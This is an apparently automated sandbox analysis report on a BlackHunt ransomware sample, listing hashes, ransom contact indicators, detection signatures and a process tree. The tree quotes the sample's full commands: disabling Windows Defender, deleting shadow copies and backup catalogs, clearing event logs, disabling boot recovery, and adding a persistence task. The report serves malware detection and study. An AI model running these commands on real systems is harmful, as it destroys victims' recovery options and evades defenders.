Analysis

max time kernel: 120s
max time network: 122s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 18/01/2024, 22:52 UTC
Static task: static1

Behavioral task: behavioral1
  Sample: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Resource: win7-20231129-en

Behavioral task: behavioral2
  Sample: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Resource: win10v2004-20231222-en
General

Target: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
Size: 707KB
MD5: 8f1b4a1ad35803c3e7306790ac78dadf
SHA1: 559111015958073f9f462b82fbc1a44cdb420441
SHA256: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87
SHA512: b2199fa282ad6740f3e981e6c3b92fef7bd834ac6fb42134dd7953038aee2faea72c3efdf4684e1fb2ab2c6755942ed782ca0748ef860a895390c328da8f6c07
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1j8Wvnh:6uaTmkZJ+naie5OTamgEoKxLWCoh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
w4ifO5uDw@gmail.com
Teikobest@gmail.com
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
  pid | Process
  2280 | fsutil.exe
  3412 | fsutil.exe

  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
  Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe

  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe

Clears Windows event logs (1 TTPs, 5 IoCs)
  pid | Process
  2620 | wevtutil.exe
  3632 | wevtutil.exe
  3776 | wevtutil.exe
  3560 | wevtutil.exe
  3680 | wevtutil.exe

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
  pid | Process
  1968 | bcdedit.exe
  1444 | bcdedit.exe
  3564 | bcdedit.exe
  4072 | bcdedit.exe

Renames multiple (2842) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

  pid | Process
  2088 | wbadmin.exe
  3888 | wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)

Deletes itself (1 IoCs)
  pid | Process
  3872 | cmd.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe

  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe

Enumerates connected drives (3 TTPs, 27 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  2 | ip-api.com

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe

Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  1336 | schtasks.exe

Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid | Process
  904 | vssadmin.exe
  3992 | vssadmin.exe
  1172 | vssadmin.exe
  2708 | vssadmin.exe
  2016 | vssadmin.exe
  2388 | vssadmin.exe

Kills process with taskkill (1 IoCs)
  pid | Process
  3772 | taskkill.exe

Modifies registry class (10 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | reg.exe
  Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | cmd.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 | cmd.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | cmd.exe
  Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
  Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | reg.exe
  Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | reg.exe

Runs ping.exe (1 TTPs, 1 IoCs)
  pid | Process
  3688 | PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  pid | Process
  1768 | mshta.exe

Suspicious use of AdjustPrivilegeToken (24 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2252 | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Token: SeRestorePrivilege | 2252 | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Token: SeBackupPrivilege | 2252 | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Token: SeTakeOwnershipPrivilege | 2252 | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Token: SeAuditPrivilege | 2252 | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Token: SeSecurityPrivilege | 2252 | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Token: SeIncBasePriorityPrivilege | 2252 | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Token: SeBackupPrivilege | 2520 | vssvc.exe
  Token: SeRestorePrivilege | 2520 | vssvc.exe
  Token: SeAuditPrivilege | 2520 | vssvc.exe
  Token: SeBackupPrivilege | 2532 | cmd.exe
  Token: SeRestorePrivilege | 2532 | cmd.exe
  Token: SeSecurityPrivilege | 2532 | cmd.exe
  Token: SeSecurityPrivilege | 3776 | wevtutil.exe
  Token: SeBackupPrivilege | 3776 | wevtutil.exe
  Token: SeSecurityPrivilege | 2620 | wevtutil.exe
  Token: SeBackupPrivilege | 2620 | wevtutil.exe
  Token: SeSecurityPrivilege | 3632 | wevtutil.exe
  Token: SeBackupPrivilege | 3632 | wevtutil.exe
  Token: SeSecurityPrivilege | 3560 | wevtutil.exe
  Token: SeBackupPrivilege | 3560 | wevtutil.exe
  Token: SeSecurityPrivilege | 3680 | wevtutil.exe
  Token: SeBackupPrivilege | 3680 | wevtutil.exe
  Token: SeDebugPrivilege | 3772 | taskkill.exe

Suspicious use of WriteProcessMemory (64 IoCs)
System policy modification (1 TTPs, 3 IoCs)
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

[1] C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
    "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"
    PID: 2252
    Signatures: UAC bypass; Checks whether UAC is enabled; Enumerates connected drives; Sets desktop wallpaper using registry; Drops file in Program Files directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory; System policy modification

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        PID: 1680

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        PID: 2736

        [3] C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
            PID: 884

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
        PID: 2612

        [3] C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
            PID: 1488

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
        PID: 2544

        [3] C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
            PID: 2308

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
        PID: 1644

        [3] C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
            PID: 2984

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
        PID: 2512

        [3] C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
            PID: 876

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
        PID: 1836

        [3] C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
            PID: 2708

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F
        PID: 2812

        [3] C:\Windows\system32\schtasks.exe
            SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F
            PID: 1336
            Signatures: Creates scheduled task(s)

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
        PID: 1828

        [3] C:\Windows\system32\fsutil.exe
            fsutil.exe usn deletejournal /D C:
            PID: 2280
            Signatures: Deletes NTFS Change Journal

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
        PID: 788

        [3] C:\Windows\system32\wbadmin.exe
            wbadmin.exe delete catalog -quiet
            PID: 2088
            Signatures: Deletes backup catalog

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
        PID: 1940

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        PID: 1016

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
        PID: 588

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
        PID: 1464

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
        PID: 1252

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
        PID: 392

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
        PID: 2140

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
        PID: 1964

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
        PID: 2684

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
        PID: 1660

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
        PID: 1640

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
        PID: 2532
        Signatures: Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
        PID: 1312

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
        PID: 1300

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
        PID: 1220

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
        PID: 1372

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
        PID: 2656

    [2] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
        PID: 952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:936
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2224
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1984
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3304
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3592
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3848
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"2⤵
- Deletes itself
PID:3872
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [w4ifO5uDw@gmail.com] AND [Teikobest@gmail.com] " /f2⤵PID:3556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3272
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵
- Modifies registry class
PID:2880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:936
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2880
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3632
-
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1172
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2708
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2592
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:1968
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2016
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1444
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:2532
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1772
-
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3032
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2388
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:904
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2656
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1160
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2088
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:976
-
